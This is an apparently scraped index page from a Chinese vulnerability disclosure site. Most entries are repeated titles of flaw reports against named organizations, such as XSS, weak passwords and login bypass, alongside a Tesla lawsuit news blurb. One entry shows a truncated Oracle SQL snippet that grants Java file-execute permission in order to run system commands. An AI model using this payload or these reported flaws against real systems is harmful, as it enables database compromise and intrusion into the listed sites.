文章列表
汽车之家(autohome.com.cn) 找回密码功能校验不严导致可恶意找回
汽车之家(autohome.com.cn) 找回密码功能校验不严导致可恶意找回
特斯拉赢得对前员工的诉讼 后者被指黑客攻击公司的制造系统
路透社周五报道称,法院判决特斯拉胜诉,并驳回了Tripp再次向法院提交答辩的动议。特斯拉没有立即回应置评请求,但据路透社报道,法院将批准特斯拉封存案件的动议。两年前, Tripp在寻求举报人保护并指责特斯拉“一些非常可怕的事情”后,最初进入了人们的视线。他告诉《华盛顿邮报》,他是向媒体提供
南孚电池(nanfu.com) 某系统存在弱口令
南孚电池(nanfu.com) 某系统存在弱口令
动漫之家(dmzj.com) 某分站存在存储型XSS漏洞
动漫之家(dmzj.com) 某分站存在存储型XSS漏洞
oracle的一些小姿势
1.执行系统命令select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;select dbms_xm
国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改
国家电网(sgcc.com.cn) 子站 存在敏感信息泄露/用户信息越权修改
联想(lenovo.com.cn)某分站URL跳转导致反射型XSS
联想(lenovo.com.cn)某分站URL跳转导致反射型XSS
北京银行(bankofbeijing.com.cn)某分站敏感信息泄露
北京银行(bankofbeijing.com.cn)某分站敏感信息泄露
百年人寿(aeonlife.com.cn)Jkstatus登录绕过
百年人寿(aeonlife.com.cn)Jkstatus登录绕过
搜狐(sohu.com)某子站存在CRLF注入漏洞
搜狐(sohu.com)某子站存在CRLF注入漏洞
